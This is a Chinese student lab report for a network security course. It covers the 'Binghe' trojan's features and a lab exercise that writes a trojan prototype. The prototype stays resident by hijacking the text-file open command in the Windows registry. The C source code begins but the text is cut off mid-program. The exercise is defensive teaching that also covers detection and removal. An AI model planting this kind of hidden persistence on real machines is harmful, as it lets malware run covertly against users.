网络安全技术实验二_程序内存驻留和木马原型.doc

沈 阳 工 程 学 院 学 生 实 验 报 告 实验室名称：信息学院网络安全实验室 实验课程名称：网络安全技术 实验项目名称：实验二 程序内存驻留与木马原型 班 级： 姓 名： 学 号：实验日期： 2014 年 3 月 21 日 实验台编号：3指导教师： 批阅教师（签字）： 成绩： 实验目的 理解内存驻留程序，编写程序实现内存驻留； 理解“冰河”原型木马，编写程序实现简单的木马。 实验内容 编程实现：“冰河”原型； 编程判断是否中了“冰河”原型木马，并能查杀木马。 实验原理 “冰河“木马开发于1999年，在设计之初，开发者的本意是编写一个功能强大的远程控制软件。但一经推出，就依靠其强大的功能成为了黑客们发动入侵的工具，并结束了国外木马一统天下的局面，成为国产木马的标志和代名词。 在2006年之前，冰河在国内一直是不可动摇的领军木马，在国内没用过冰河的人等于没用过木马，由此可见冰河木马在国内的影响力之巨大。 1) 自动跟踪目标机屏幕变化，同时可以完全模拟键盘及鼠标输入,即在同步被控端屏幕变化的同时，监控端的一切键盘及鼠标操作将反映在被控端屏幕（局域网适用）； 2) 记录各种口令信息：包括开机口令、屏保口令、各种共享资源口令及绝大多数在对话框中出现过的口令信息； 3) 获取系统信息：包括计算机名、注册公司、当前用户、系统路径、操作系统版本、当前显示分辨率、物理及逻辑磁盘信息等多项系统数据； 4) 限制系统功能：包括远程关机、远程重启计算机、锁定鼠标、锁定系统热键及锁定注册表等多项功能限制； 5) 远程文件操作：包括创建、上传、下载、复制、删除文件或目录、文件压缩、快速浏览文本文件、远程打开文件（提供了四中不同的打开方式——正常方式、最大化、最小化和隐藏方式）等多项文件操作功能； 6) 注册表操作：包括对主键的浏览、增删、复制、重命名和对键值的读写等所有注册表操作功能； 7) 发送信息：以四种常用图标向被控端发送简短信息； 8) 点对点通讯：以聊天室形式同被控端进行在线交谈。 从一定程度上可以说冰河是最有名的木马了，就连刚接触电脑的用户也听说过它。虽然许多杀毒软件可以查杀它，但国内仍有几十万中冰河的电脑存在！作为木马，冰河创造了最多人使用、最多人中弹的奇迹！ 实验软硬件环境 虚拟机中windows2000环境。 实验步骤 第一步：“冰河”木马的文本文件关联 采用“冰河”将自己与文本文件的打开方式相关联的方法实现植入“冰河”。关联的方法就是使用注册表“HKEY_CLASSES_ROOT”主键下的“txtfile\shell\open\command”键。 程序要实现的功能是：当用户双击打开一个文本文件，先启动要驻留的程序，然后再启动记事本打开这个文本文件。这包括两方面内容，一是编程修改注册表，二是编程实现程序自动驻留。 运行本程序前，请先确定系统是否中了“冰河”。有查看注册表内容和程序两种判断方式。分别如图1和图2所示。 图1 通过注册表判断未中“冰河” 图2 通过程序判断未中“冰河” 【程序源代码】 　　#include stdio.h 　　#include windows.h 　　//结构WNDCLASS包含一个窗口类的全部信息 　　WNDCLASS wc; 　　HWND h_wnd; 　　MSG msg; 　　//冰河木马修改注册表函数IceRiverEditReg声明 　　bool IceRiverEditReg(void); 　　//消息处理函数wndProc的声明 　　long WINAPI WindowProc(HWND,UINT,WPARAM,LPARAM); 　　//winMain函数的功能是被系统调用，作为一个32位应用程序的入口点。 　　int PASCAL WinMain(HINSTANCE h_CurInstance, 　　HINSTANCE h_PrevInstance,LPSTR p_CmdLine,int m_Show) 　　{ 　　 //修改注册表 　　 bool bRegEditFlag = IceRiverEditReg(); 　　 //以下被注释的代码为判定注册表是否修改成功 　　 /*if (bRegEditFlag == true) 　　 MessageBox(NULL,注册表修改成功！,,MB_OK);*/ 　　 //bSsuccess用于保存CreateProcess函数返回值 　　 BOOL bSuccess; 　　 //PROCESS_INFORMATION结构返回有关新进程及其主线程的信息。 　　 PROCESS_INFORMATION piProcInfo; 　　 //STARTU